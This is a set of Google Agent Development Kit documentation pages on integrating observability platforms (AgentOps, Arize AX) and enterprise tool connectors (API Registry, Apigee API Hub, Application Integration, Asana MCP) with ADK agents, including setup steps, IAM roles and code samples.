Actions](https://docs.copilotkit.ai/adk/frontend-actions) Or try them out in the [AG-UI Dojo](https://dojo.ag-ui.com).
# AgentOps observability for ADK Supported in ADK: Python **With just two lines of code**, [AgentOps](https://www.agentops.ai) provides session replays, metrics, and monitoring for agents. ## Why AgentOps for ADK? Observability is a key aspect of developing and deploying conversational AI agents. It allows developers to understand how their agents are performing, how their agents are interacting with users, and how their agents use external tools and APIs. By integrating AgentOps, developers can gain deep insights into their ADK agent's behavior, LLM interactions, and tool usage. Google ADK includes its own OpenTelemetry-based tracing system, primarily aimed at providing developers with a way to trace the basic flow of execution within their agents. AgentOps enhances this by offering a dedicated and more comprehensive observability platform with: - **Unified Tracing and Replay Analytics:** Consolidate traces from ADK and other components of your AI stack. - **Rich Visualization:** Intuitive dashboards to visualize agent execution flow, LLM calls, and tool performance. - **Detailed Debugging:** Drill down into specific spans, view prompts, completions, token counts, and errors. - **LLM Cost and Latency Tracking:** Track latencies, costs (via token usage), and identify bottlenecks. - **Simplified Setup:** Get started with just a few lines of code. *AgentOps dashboard displaying a trace from a multi-step ADK application execution. The main workflow agent span contains child spans for sub-agent operations, LLM calls, and tool executions.* ## Getting Started with AgentOps and ADK Integrating AgentOps into your ADK application is straightforward: 1. **Install AgentOps:** ```bash pip install -U agentops ``` 1.
**Create an API key:** Create a user API key on the [Create API Key](https://app.agentops.ai/settings/projects) page, then add it to your environment variables: ```text AGENTOPS_API_KEY= ``` 1. **Initialize AgentOps:** Add the following lines at the beginning of your ADK application script (e.g., your main Python file running the ADK `Runner`): ```python import agentops agentops.init() ``` This starts an AgentOps session and automatically tracks ADK agents. Detailed example: ```python import agentops import os from dotenv import load_dotenv # Load environment variables (optional, if you use a .env file for API keys) load_dotenv() agentops.init( api_key=os.getenv("AGENTOPS_API_KEY"), # Your AgentOps API Key trace_name="my-adk-app-trace" # Optional: A name for your trace # auto_start_session=True is the default. # Set to False if you want to manually control session start/end. ) ``` > 🚨 🔑 You can find your AgentOps API key on your [AgentOps Dashboard](https://app.agentops.ai/) after signing up. It's recommended to set it as an environment variable (`AGENTOPS_API_KEY`). Once initialized, AgentOps will automatically begin instrumenting your ADK agent. **This is all you need to capture all telemetry data for your ADK agent.** ## How AgentOps Instruments ADK AgentOps uses the following strategy to provide observability without conflicting with ADK's native telemetry: 1. **Neutralizing ADK's Native Telemetry:** AgentOps detects ADK and patches ADK's internal OpenTelemetry tracer (typically `trace.get_tracer('gcp.vertex.agent')`). It replaces it with a `NoOpTracer`, ensuring that ADK's own attempts to create telemetry spans are effectively silenced. This prevents duplicate traces and allows AgentOps to be the authoritative source for observability data. 1.
**AgentOps-Controlled Span Creation:** AgentOps takes control by wrapping key ADK methods to create a logical hierarchy of spans: - **Agent Execution Spans (e.g., `adk.agent.MySequentialAgent`):** When an ADK agent (like `BaseAgent`, `SequentialAgent`, or `LlmAgent`) starts its `run_async` method, AgentOps initiates a parent span for that agent's execution. - **LLM Interaction Spans (e.g., `adk.llm.gemini-pro`):** For calls made by an agent to an LLM (via ADK's `BaseLlmFlow._call_llm_async`), AgentOps creates a dedicated child span, typically named after the LLM model. This span captures request details (prompts, model parameters) and, upon completion (via ADK's `_finalize_model_response_event`), records response details like completions, token usage, and finish reasons. - **Tool Usage Spans (e.g., `adk.tool.MyCustomTool`):** When an agent uses a tool (via ADK's `functions.__call_tool_async`), AgentOps creates a single, comprehensive child span named after the tool. This span includes the tool's input parameters and the result it returns. 1. **Rich Attribute Collection:** AgentOps reuses ADK's internal data extraction logic. It patches ADK's specific telemetry functions (e.g., `google.adk.telemetry.trace_tool_call`, `trace_call_llm`). The AgentOps wrappers for these functions take the detailed information ADK gathers and attach it as attributes to the *currently active AgentOps span*. ## Visualizing Your ADK Agent in AgentOps When you instrument your ADK application with AgentOps, you gain a clear, hierarchical view of your agent's execution in the AgentOps dashboard. 1. **Initialization:** When `agentops.init()` is called (e.g., `agentops.init(trace_name="my_adk_application")`), an initial parent span is created if the init param `auto_start_session=True` (true by default). This span, often named similar to `my_adk_application.session`, will be the root for all operations within that trace. 1. 
**ADK Runner Execution:** When an ADK `Runner` executes a top-level agent (e.g., a `SequentialAgent` orchestrating a workflow), AgentOps creates a corresponding agent span under the session trace. This span will reflect the name of your top-level ADK agent (e.g., `adk.agent.YourMainWorkflowAgent`). 1. **Sub-Agent and LLM/Tool Calls:** As this main agent executes its logic, including calling sub-agents, LLMs, or tools: - Each **sub-agent execution** will appear as a nested child span under its parent agent. - Calls to **Large Language Models** will generate further nested child spans (e.g., `adk.llm.`), capturing prompt details, responses, and token usage. - **Tool invocations** will also result in distinct child spans (e.g., `adk.tool.`), showing their parameters and results. This creates a waterfall of spans, allowing you to see the sequence, duration, and details of each step in your ADK application. All relevant attributes, such as LLM prompts, completions, token counts, tool inputs/outputs, and agent names, are captured and displayed. For a practical demonstration, you can explore a sample Jupyter Notebook that illustrates a human approval workflow using Google ADK and AgentOps: [Google ADK Human Approval Example on GitHub](https://github.com/AgentOps-AI/agentops/blob/main/examples/google_adk/human_approval.ipynb). This example showcases how a multi-step agent process with tool usage is visualized in AgentOps. ## Benefits - **Effortless Setup:** Minimal code changes for comprehensive ADK tracing. - **Deep Visibility:** Understand the inner workings of complex ADK agent flows. - **Faster Debugging:** Quickly pinpoint issues with detailed trace data. - **Performance Optimization:** Analyze latencies and token usage. By integrating AgentOps, ADK developers can significantly enhance their ability to build, debug, and maintain robust AI agents. ## Further Information To get started, [create an AgentOps account](http://app.agentops.ai). 
For feature requests or bug reports, please reach out to the AgentOps team on the [AgentOps Repo](https://github.com/AgentOps-AI/agentops). ### Extra links 🐦 [Twitter](http://x.com/agentopsai) • 📢 [Discord](http://x.com/agentopsai) • 🖇️ [AgentOps Dashboard](http://app.agentops.ai) • 📙 [Documentation](http://docs.agentops.ai) # Google Cloud API Registry tool for ADK Supported in ADK: Python v1.20.0 (Preview) The Google Cloud API Registry connector tool for Agent Development Kit (ADK) lets you access a wide range of Google Cloud services for your agents as Model Context Protocol (MCP) servers through the [Google Cloud API Registry](https://docs.cloud.google.com/api-registry/docs/overview). You can configure this tool to connect your agent to your Google Cloud projects and dynamically access Cloud services enabled for that project. **Preview release:** The Google Cloud API Registry feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). ## Prerequisites Before using the API Registry with your agent, you need to ensure the following: - **Google Cloud project:** Configure your agent to access AI models using an existing Google Cloud project. - **API Registry access:** The environment where your agent runs needs Google Cloud [Application Default Credentials](https://docs.cloud.google.com/docs/authentication/provide-credentials-adc) with the `apiregistry.viewer` role to list available MCP servers. - **Cloud APIs:** In your Google Cloud project, enable the *cloudapiregistry.googleapis.com* and *apihub.googleapis.com* Google Cloud APIs. - **MCP Server and Tool access:** Make sure you enable the MCP Servers in the API Registry for the Google Cloud services in your Cloud Project that you want to access with your agent. You can enable this in the Cloud Console or use a gcloud command such as: `gcloud beta api-registry mcp enable bigquery.googleapis.com --project={PROJECT_ID}`.
The credentials used by the agent must have permissions to access the MCP server and the underlying services used by the tools. For example, to use BigQuery tools, the service account needs BigQuery IAM roles like `bigquery.dataViewer` and `bigquery.jobUser`. For more information about required permissions, see [Authentication and access](#auth). You can check which MCP servers are enabled with API Registry using the following gcloud command: ```console gcloud beta api-registry mcp servers list --project={PROJECT_ID} ``` ## Use with agent When configuring the API Registry connector tool with an agent, you first initialize the `ApiRegistry` class to establish a connection with Cloud services, and then use the `get_toolset()` function to retrieve a toolset for a specific MCP server registered in the API Registry. The following code example demonstrates how to create an agent that uses tools from an MCP server listed in API Registry. This agent is designed to interact with BigQuery: ```python import os from google.adk.agents.llm_agent import LlmAgent from google.adk.tools.api_registry import ApiRegistry # Configure with your Google Cloud Project ID and registered MCP server name PROJECT_ID = "your-google-cloud-project-id" MCP_SERVER_NAME = "projects/your-google-cloud-project-id/locations/global/mcpServers/your-mcp-server-name" # Example header provider for BigQuery, a project header is required.
def header_provider(context): return {"x-goog-user-project": PROJECT_ID} # Initialize ApiRegistry api_registry = ApiRegistry( api_registry_project_id=PROJECT_ID, header_provider=header_provider ) # Get the toolset for the specific MCP server registry_tools = api_registry.get_toolset( mcp_server_name=MCP_SERVER_NAME, # Optionally filter tools: #tool_filter=["list_datasets", "run_query"] ) # Create an agent with the tools root_agent = LlmAgent( model="gemini-1.5-flash", # Or your preferred model name="bigquery_assistant", instruction=""" Help user access their BigQuery data using the available tools. """, tools=[registry_tools], ) ``` For the complete code for this example, see the [api_registry_agent](https://github.com/google/adk-python/tree/main/contributing/samples/api_registry_agent/) sample. For information on the configuration options, see [Configuration](#configuration). For information on the authentication for this tool, see [Authentication and access](#auth). ## Authentication and access Using the API Registry with your agent requires authentication for the services the agent accesses. By default the tool uses Google Cloud [Application Default Credentials](https://docs.cloud.google.com/docs/authentication/provide-credentials-adc) for authentication. When using this tool make sure your agent has the following permissions and access: - **API Registry access:** The `ApiRegistry` class uses Application Default Credentials (`google.auth.default()`) to authenticate requests to the Google Cloud API Registry to list the available MCP servers. Ensure the environment where the agent runs has credentials with the necessary permissions to view the API Registry resources, such as `apiregistry.viewer`. - **MCP Server and Tool access:** The `McpToolset` returned by `get_toolset` also uses the Google Cloud Application Default Credentials by default to authenticate calls to the actual MCP server endpoint. 
The credentials used must have the necessary permissions for both: 1. Accessing the MCP server itself. 1. Utilizing the underlying services and resources that the tools interact with. - **MCP Tool user role:** Allow the account used by your agent to call MCP tools through the API Registry by granting the MCP tool user role: `gcloud projects add-iam-policy-binding {PROJECT_ID} --member={member} --role="roles/mcp.toolUser"` For example, when using MCP server tools that interact with BigQuery, the account associated with the credentials, such as a service account, must be granted appropriate BigQuery IAM roles, such as `bigquery.dataViewer` or `bigquery.jobUser`, within your Google Cloud project to access datasets and run queries. In the case of the BigQuery MCP server, a `"x-goog-user-project": PROJECT_ID` header is required to use its tools. Additional headers for authentication or project context can be injected via the `header_provider` argument in the `ApiRegistry` constructor. ## Configuration The `ApiRegistry` object has the following configuration options: - **`api_registry_project_id`** (str): The Google Cloud Project ID where the API Registry is located. - **`location`** (str, optional): The location of the API Registry resources. Defaults to `"global"`. - **`header_provider`** (Callable, optional): A function that takes the call context and returns a dictionary of additional HTTP headers to be sent with requests to the MCP server. This is often used for dynamic authentication or project-specific headers. The `get_toolset()` function has the following configuration options: - **`mcp_server_name`** (str): The full name of the registered MCP server from which to load tools, for example: `projects/my-project/locations/global/mcpServers/my-server`. - **`tool_filter`** (Union\[ToolPredicate, List[str]\], optional): Specifies which tools to include in the toolset. - If a list of strings, only tools with names in the list are included.
- If a `ToolPredicate` function, the function is called for each tool, and only tools for which it returns `True` are included. - If `None`, all tools from the MCP server are included. - **`tool_name_prefix`** (str, optional): A prefix to add to the name of each tool in the resulting toolset. ## Additional resources - [api_registry_agent](https://github.com/google/adk-python/tree/main/contributing/samples/api_registry_agent/) ADK code sample - [Google Cloud API Registry](https://docs.cloud.google.com/api-registry/docs/overview) documentation # Apigee API Hub tool for ADK Supported in ADK: Python v0.1.0 **ApiHubToolset** lets you turn any documented API from Apigee API hub into a tool with a few lines of code. This section walks through the steps, including how to set up authentication for a secure connection to your APIs. **Prerequisites** 1. [Install ADK](/adk-docs/get-started/installation/) 1. Install the [Google Cloud CLI](https://cloud.google.com/sdk/docs/install?db=bigtable-docs#installation_instructions). 1. [Apigee API hub](https://cloud.google.com/apigee/docs/apihub/what-is-api-hub) instance with documented (i.e. OpenAPI spec) APIs 1. Set up your project structure and create required files ```console project_root_folder | `-- my_agent |-- .env |-- __init__.py |-- agent.py `-- tools.py ``` ## Create an API Hub Toolset Note: This tutorial includes creating an agent. If you already have an agent, you only need to follow a subset of these steps. 1. Get your access token so that `APIHubToolset` can fetch the spec from the API Hub API. In your terminal, run the following command: ```shell gcloud auth print-access-token # Prints your access token like 'ya29....' ``` 1. Ensure that the account used has the required permissions. You can use the pre-defined role `roles/apihub.viewer` or assign the following permissions: 1. **apihub.specs.get (required)** 1. apihub.apis.get (optional) 1. apihub.apis.list (optional) 1. apihub.versions.get (optional) 1.
apihub.versions.list (optional) 1. apihub.specs.list (optional) 1. Create a tool with `APIHubToolset`. Add the following to `tools.py`. If your API requires authentication, you must configure authentication for the tool. The following code sample demonstrates how to configure an API key. ADK supports token based auth (API Key, Bearer token), service account, and OpenID Connect. We will soon add support for various OAuth2 flows. ```py from google.adk.tools.openapi_tool.auth.auth_helpers import token_to_scheme_credential from google.adk.tools.apihub_tool.apihub_toolset import APIHubToolset apikey_credential_str = "..." # TODO: replace with the API key for your API # Provide authentication for your APIs. Not required if your APIs don't require authentication. auth_scheme, auth_credential = token_to_scheme_credential( "apikey", "query", "apikey", apikey_credential_str ) sample_toolset = APIHubToolset( name="apihub-sample-tool", description="Sample Tool", access_token="...", # Copy your access token generated in step 1 apihub_resource_name="...", # API Hub resource name auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` For production deployment we recommend using a service account instead of an access token. In the code snippet above, use `service_account_json=service_account_cred_json_str` and provide your service account credentials instead of the token. For `apihub_resource_name`, if you know the specific ID of the OpenAPI Spec being used for your API, use `projects/my-project-id/locations/us-west1/apis/my-api-id/versions/version-id/specs/spec-id`. If you would like the Toolset to automatically pull the first available spec from the API, use `projects/my-project-id/locations/us-west1/apis/my-api-id`. 1.
Create your agent file `agent.py` and add the created tools to your agent definition: ```py from google.adk.agents.llm_agent import LlmAgent from .tools import sample_toolset root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction='Help user, leverage the tools you have access to', tools=sample_toolset.get_tools(), ) ``` 1. Configure your `__init__.py` to expose your agent ```py from . import agent ``` 1. Start the Google ADK Web UI and try your agent: ```shell # make sure to run `adk web` from your project_root_folder adk web ``` Then open the URL that `adk web` prints in your terminal (http://localhost:8000 by default) to try your agent from the Web UI. # Google Cloud Application Integration tool for ADK Supported in ADK: Python v0.1.0, Java v0.3.0 With **ApplicationIntegrationToolset**, you can give your agents secure and governed access to enterprise applications using Integration Connectors' 100+ pre-built connectors for systems like Salesforce, ServiceNow, JIRA, SAP, and more. It supports both on-premises and SaaS applications. In addition, you can turn your existing Application Integration process automations into agentic workflows by providing application integration workflows as tools to your ADK agents. Federated search within Application Integration lets you use ADK agents to query multiple enterprise applications and data sources simultaneously. [See how ADK Federated Search in Application Integration works in this video walkthrough](https://www.youtube.com/watch?v=JdlWOQe5RgU) ## Prerequisites ### 1. Install ADK Install Agent Development Kit following the steps in the [installation guide](/adk-docs/get-started/installation/). ### 2. Install CLI Install the [Google Cloud CLI](https://cloud.google.com/sdk/docs/install#installation_instructions).
To use the tool with default credentials, run the following commands: ```shell gcloud config set project <project-id> gcloud auth application-default login gcloud auth application-default set-quota-project <project-id> ``` Replace `<project-id>` with the unique ID of your Google Cloud project. ### 3. Provision Application Integration workflow and publish Connection Tool Use an existing [Application Integration](https://cloud.google.com/application-integration/docs/overview) workflow or [Integrations Connector](https://cloud.google.com/integration-connectors/docs/overview) connection you want to use with your agent. You can also create a new [Application Integration workflow](https://cloud.google.com/application-integration/docs/setup-application-integration) or a [connection](https://cloud.google.com/integration-connectors/docs/connectors/neo4j/configure#configure-the-connector). Import and publish the [Connection Tool](https://console.cloud.google.com/integrations/templates/connection-tool/locations/global) from the template library. **Note**: To use a connector from Integration Connectors, you need to provision the Application Integration in the same region as your connection. ### 4. Create project structure For Python, set up your project structure and create the required files: ```console project_root_folder ├── .env └── my_agent ├── __init__.py ├── agent.py └── tools.py ``` When running the agent, make sure to run `adk web` from the `project_root_folder`. For Java, set up your project structure and create the required files: ```console project_root_folder └── my_agent ├── agent.java └── pom.xml ``` When running the agent, make sure to run the commands from the `project_root_folder`. ### 5.
Set roles and permissions To get the permissions that you need to set up **ApplicationIntegrationToolset**, you must have the following IAM roles on the project (common to both Integration Connectors and Application Integration Workflows): ```text - roles/integrations.integrationEditor - roles/connectors.invoker - roles/secretmanager.secretAccessor ``` **Note:** When using Agent Engine (AE) for deployment, don't use `roles/integrations.integrationInvoker`, as it can result in 403 errors. Use `roles/integrations.integrationEditor` instead. ## Use Integration Connectors Connect your agent to enterprise applications using [Integration Connectors](https://cloud.google.com/integration-connectors/docs/overview). ### Before you begin **Note:** The *ExecuteConnection* integration is typically created automatically when you provision Application Integration in a given region. If the *ExecuteConnection* doesn't exist in the [list of integrations](https://console.cloud.google.com/integrations/list), you must follow these steps to create it: 1. To use a connector from Integration Connectors, click **QUICK SETUP** and [provision](https://console.cloud.google.com/integrations) Application Integration in the same region as your connection. 1. Go to the [Connection Tool](https://console.cloud.google.com/integrations/templates/connection-tool/locations/us-central1) template in the template library and click **USE TEMPLATE**. 1. Enter the Integration Name as *ExecuteConnection* (it is mandatory to use this exact integration name only). Then, select the region to match your connection region and click **CREATE**. 1. Click **PUBLISH** to publish the integration in the *Application Integration* editor. ### Create an Application Integration Toolset To create an Application Integration Toolset for Integration Connectors, follow these steps: 1. 
Create a tool with `ApplicationIntegrationToolset` in the `tools.py` file: ```py from google.adk.tools.application_integration_tool.application_integration_toolset import ApplicationIntegrationToolset connector_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection connection="test-connection", #TODO: replace with connection name entity_operations={"Entity_One": ["LIST","CREATE"], "Entity_Two": []},#empty list for actions means all operations on the entity are supported. actions=["action1"], #TODO: replace with actions service_account_json='{...}', # optional. Stringified json for service account key tool_name_prefix="tool_prefix2", tool_instructions="..." ) ``` **Note:** - You can provide a service account to be used instead of default credentials by generating a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating), and providing the right [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. - To find the list of supported entities and actions for a connection, use the Connectors APIs: [listActions](https://cloud.google.com/integration-connectors/docs/reference/rest/v1/projects.locations.connections.connectionSchemaMetadata/listActions) or [listEntityTypes](https://cloud.google.com/integration-connectors/docs/reference/rest/v1/projects.locations.connections.connectionSchemaMetadata/listEntityTypes). `ApplicationIntegrationToolset` supports `auth_scheme` and `auth_credential` for **dynamic OAuth2 authentication** for Integration Connectors. 
To use it, create a tool similar to this in the `tools.py` file: ```py from google.adk.tools.application_integration_tool.application_integration_toolset import ApplicationIntegrationToolset from google.adk.tools.openapi_tool.auth.auth_helpers import dict_to_auth_scheme from google.adk.auth import AuthCredential from google.adk.auth import AuthCredentialTypes from google.adk.auth import OAuth2Auth oauth2_data_google_cloud = { "type": "oauth2", "flows": { "authorizationCode": { "authorizationUrl": "https://accounts.google.com/o/oauth2/auth", "tokenUrl": "https://oauth2.googleapis.com/token", "scopes": { "https://www.googleapis.com/auth/cloud-platform": ( "View and manage your data across Google Cloud Platform" " services" ), "https://www.googleapis.com/auth/calendar.readonly": "View your calendars" }, } }, } oauth_scheme = dict_to_auth_scheme(oauth2_data_google_cloud) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OAUTH2, oauth2=OAuth2Auth( client_id="...", #TODO: replace with client_id client_secret="...", #TODO: replace with client_secret ), ) connector_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection connection="test-connection", #TODO: replace with connection name entity_operations={"Entity_One": ["LIST","CREATE"], "Entity_Two": []},#empty list for actions means all operations on the entity are supported. actions=["GET_calendars/%7BcalendarId%7D/events"], #TODO: replace with actions. this one is for list events service_account_json='{...}', # optional. Stringified json for service account key tool_name_prefix="tool_prefix2", tool_instructions="...", auth_scheme=oauth_scheme, auth_credential=auth_credential ) ``` 1. 
Update the `agent.py` file and add the tool to your agent: ```py from google.adk.agents.llm_agent import LlmAgent from .tools import connector_tool root_agent = LlmAgent( model='gemini-2.0-flash', name='connector_agent', instruction="Help user, leverage the tools you have access to", tools=[connector_tool], ) ``` 1. Configure `__init__.py` to expose your agent: ```py from . import agent ``` 1. Start the Google ADK Web UI and use your agent: ```shell # make sure to run `adk web` from your project_root_folder adk web ``` After completing the above steps, open the URL that `adk web` prints in your terminal (http://localhost:8000 by default), and choose the `my_agent` agent (which is the same as the agent folder name). ## Use Application Integration Workflows Use an existing [Application Integration](https://cloud.google.com/application-integration/docs/overview) workflow as a tool for your agent or create a new one. ### 1. Create a tool To create a tool with `ApplicationIntegrationToolset` in the `tools.py` file, use the following code: ```py from google.adk.tools.application_integration_tool.application_integration_toolset import ApplicationIntegrationToolset integration_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection integration="test-integration", #TODO: replace with integration name triggers=["api_trigger/test_trigger"],#TODO: replace with trigger id(s). An empty list means all API triggers in the integration are considered. service_account_json='{...}', #optional. Stringified json for service account key tool_name_prefix="tool_prefix1", tool_instructions="..." ) ``` **Note:** You can provide a service account to be used instead of using default credentials. To do this, generate a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating) and provide the correct [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. For more details about the IAM roles, refer to the [Prerequisites](#prerequisites) section.
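The `service_account_json` argument above expects the key as a JSON string rather than a file path. The following is a minimal sketch of turning a downloaded key file into that form, using only the Python standard library. The helper name `load_service_account_json` and the example path `sa-key.json` are hypothetical, and the field check reflects the usual layout of a Google service account key file, not a requirement documented for `ApplicationIntegrationToolset`.

```python
import json
from pathlib import Path

# Fields normally present in a Google service account key file (assumption:
# used here only as a sanity check, not as an ADK requirement).
EXPECTED_FIELDS = {"type", "project_id", "private_key", "client_email"}


def load_service_account_json(key_path: str) -> str:
    """Read a service account key file and return it as a compact JSON string."""
    key = json.loads(Path(key_path).read_text(encoding="utf-8"))
    if not isinstance(key, dict):
        raise ValueError("Key file must contain a JSON object")
    missing = EXPECTED_FIELDS - key.keys()
    if missing:
        raise ValueError(f"Key file is missing fields: {sorted(missing)}")
    # Re-serialize so the result is a single-line string suitable for passing along.
    return json.dumps(key)
```

The returned string could then be passed as `service_account_json=load_service_account_json("sa-key.json")`. Keep key files out of version control.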
To create a tool with `ApplicationIntegrationToolset` in the `tools.java` file, use the following code:

```java
import com.google.adk.tools.applicationintegrationtoolset.ApplicationIntegrationToolset;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;

public class Tools {
    // Public so that the agent class in the next step can reference them.
    public static ApplicationIntegrationToolset integrationTool;
    public static ApplicationIntegrationToolset connectionsTool;

    static {
        // Toolset backed by an Application Integration workflow.
        integrationTool = new ApplicationIntegrationToolset(
                "test-project",
                "us-central1",
                "test-integration",
                ImmutableList.of("api_trigger/test-api"),
                null,
                null,
                null,
                "{...}",
                "tool_prefix1",
                "...");

        // Toolset backed by an Integration Connectors connection.
        connectionsTool = new ApplicationIntegrationToolset(
                "test-project",
                "us-central1",
                null,
                null,
                "test-connection",
                ImmutableMap.of("Issue", ImmutableList.of("GET")),
                ImmutableList.of("ExecuteCustomQuery"),
                "{...}",
                "tool_prefix",
                "...");
    }
}
```

**Note:** You can provide a service account to be used instead of the default credentials. To do this, generate a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating) and grant the correct [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. For more details about the IAM roles, refer to the [Prerequisites](#prerequisites) section.

### 2. Add the tool to your agent

To update the `agent.py` file and add the tool to your agent, use the following code:

```py
from google.adk.agents.llm_agent import LlmAgent
from .tools import integration_tool, connector_tool

root_agent = LlmAgent(
    model='gemini-2.0-flash',
    name='integration_agent',
    instruction="Help user, leverage the tools you have access to",
    tools=[integration_tool],
)
```

To update the `agent.java` file and add the tool to your agent, use the following code:

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.tools.BaseTool;
import com.google.common.collect.ImmutableList;

public class MyAgent {
    public static void main(String[] args) {
        // Assuming Tools class is defined as in the previous step
        ImmutableList tools = ImmutableList.builder()
                .add(Tools.integrationTool)
                .add(Tools.connectionsTool)
                .build();

        // Finally, create your agent with the tools generated automatically.
        LlmAgent rootAgent = LlmAgent.builder()
                .name("science-teacher")
                .description("Science teacher agent")
                .model("gemini-2.0-flash")
                .instruction(
                        "Help user, leverage the tools you have access to."
                )
                .tools(tools)
                .build();

        // You can now use rootAgent to interact with the LLM
        // For example, you can start a conversation with the agent.
    }
}
```

**Note:** To find the list of supported entities and actions for a connection, use these Connector APIs: `listActions`, `listEntityTypes`.

### 3. Expose your agent

To configure `__init__.py` to expose your agent, use the following code:

```py
from . import agent
```

### 4. Use your agent

To start the Google ADK Web UI and use your agent, use the following commands:

```shell
# make sure to run `adk web` from your project_root_folder
adk web
```

After completing the above steps, open the ADK Web UI in your browser and choose the `my_agent` agent (which is the same as the agent folder name).
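Because the agent name shown in the UI matches the agent folder name, a quick check of the project layout before running `adk web` can help. The sketch below is a convenience under stated assumptions, not ADK's own discovery logic: the helper `list_agent_folders` is hypothetical, and it only looks for the `__init__.py` and `agent.py` files created in the steps above.

```python
from pathlib import Path


def list_agent_folders(project_root: str) -> list[str]:
    """Return names of subfolders that contain both __init__.py and agent.py."""
    root = Path(project_root)
    return sorted(
        child.name
        for child in root.iterdir()
        if child.is_dir()
        and (child / "__init__.py").is_file()
        and (child / "agent.py").is_file()
    )


if __name__ == "__main__":
    # Run from the project root, the same folder you would run `adk web` from.
    print(list_agent_folders("."))
```

If the folder you expect is missing from the output, the usual causes are a missing `__init__.py` or running the command from inside the agent folder instead of its parent.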
To start the Google ADK Web UI and use your agent, use the following commands:

```bash
mvn install

mvn exec:java \
    -Dexec.mainClass="com.google.adk.web.AdkWebServer" \
    -Dexec.args="--adk.agents.source-dir=src/main/java" \
    -Dexec.classpathScope="compile"
```

After completing the above steps, open the ADK Web UI in your browser and choose the `my_agent` agent (which is the same as the agent folder name).

# Arize AX observability for ADK

[Arize AX](https://arize.com/docs/ax) is a production-grade observability platform for monitoring, debugging, and improving LLM applications and AI Agents at scale. It provides comprehensive tracing, evaluation, and monitoring capabilities for your Google ADK applications. To get started, sign up for a [free account](https://app.arize.com/auth/join).

For an open-source, self-hosted alternative, check out [Phoenix](https://arize.com/docs/phoenix).

## Overview

Arize AX can automatically collect traces from Google ADK using [OpenInference instrumentation](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk), allowing you to:

- **Trace agent interactions** - Automatically capture every agent run, tool call, model request, and response with context and metadata
- **Evaluate performance** - Assess agent behavior using custom or pre-built evaluators and run experiments to test agent configurations
- **Monitor in production** - Set up real-time dashboards and alerts to track performance
- **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and any unexpected agent behavior

## Installation

Install the required packages:

```bash
pip install openinference-instrumentation-google-adk google-adk arize-otel
```

## Setup

### 1. Configure Environment Variables

Set your Google API key:

```bash
export GOOGLE_API_KEY=[your_key_here]
```

### 2. Connect your application to Arize AX

```python
from arize.otel import register

# Register with Arize AX
tracer_provider = register(
    space_id="your-space-id",  # Found in app space settings page
    api_key="your-api-key",  # Found in app space settings page
    project_name="your-project-name",  # Name this whatever you prefer
)

# Import and configure the automatic instrumentor from OpenInference
from openinference.instrumentation.google_adk import GoogleADKInstrumentor

# Finish automatic instrumentation
GoogleADKInstrumentor().instrument(tracer_provider=tracer_provider)
```

## Observe

Now that you have tracing set up, all Google ADK SDK requests will be streamed to Arize AX for observability and evaluation.

```python
import nest_asyncio
nest_asyncio.apply()

from google.adk.agents import Agent
from google.adk.runners import InMemoryRunner
from google.genai import types

# Define a tool function
def get_weather(city: str) -> dict:
    """Retrieves the current weather report for a specified city.

    Args:
        city (str): The name of the city for which to retrieve the weather report.

    Returns:
        dict: status and result or error msg.
    """
    if city.lower() == "new york":
        return {
            "status": "success",
            "report": (
                "The weather in New York is sunny with a temperature of 25 degrees"
                " Celsius (77 degrees Fahrenheit)."
            ),
        }
    else:
        return {
            "status": "error",
            "error_message": f"Weather information for '{city}' is not available.",
        }

# Create an agent with tools
agent = Agent(
    name="weather_agent",
    model="gemini-2.0-flash-exp",
    description="Agent to answer questions using weather tools.",
    instruction="You must use the available tools to find an answer.",
    tools=[get_weather]
)

app_name = "weather_app"
user_id = "test_user"
session_id = "test_session"
runner = InMemoryRunner(agent=agent, app_name=app_name)
session_service = runner.session_service

# Top-level `await` works in a notebook; in a script, wrap the code below
# in an async function and run it with asyncio.run().
await session_service.create_session(
    app_name=app_name,
    user_id=user_id,
    session_id=session_id
)

# Run the agent (all interactions will be traced)
async for event in runner.run_async(
    user_id=user_id,
    session_id=session_id,
    new_message=types.Content(role="user", parts=[
        types.Part(text="What is the weather in New York?")]
    )
):
    if event.is_final_response():
        print(event.content.parts[0].text.strip())
```

## View Results in Arize AX

## Support and Resources

- [Arize AX Documentation](https://arize.com/docs/ax/integrations/frameworks-and-platforms/google-adk)
- [Arize Community Slack](https://arize-ai.slack.com/join/shared_invite/zt-11t1vbu4x-xkBIHmOREQnYnYDH1GDfCg#/shared-invite/email)
- [OpenInference Package](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk)

# Asana MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Asana MCP Server](https://developers.asana.com/docs/using-asanas-mcp-server) connects your ADK agent to the [Asana](https://asana.com/) work management platform. This integration gives your agent the ability to manage projects, tasks, goals, and team collaboration using natural language.

## Use cases

- **Track Project Status**: Get real-time updates on project progress, view status reports, and retrieve information about milestones and deadlines.
- **Manage Tasks**: Create, update, and organize tasks using natural language. Let your agent handle task assignments, status changes, and priority updates.
- **Monitor Goals**: Access and update Asana Goals to track team objectives and key results across your organization.

## Prerequisites

- An [Asana](https://asana.com/) account with access to a workspace

## Use with agent

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

root_agent = Agent(
    model="gemini-2.5-pro",
    name="asana_agent",
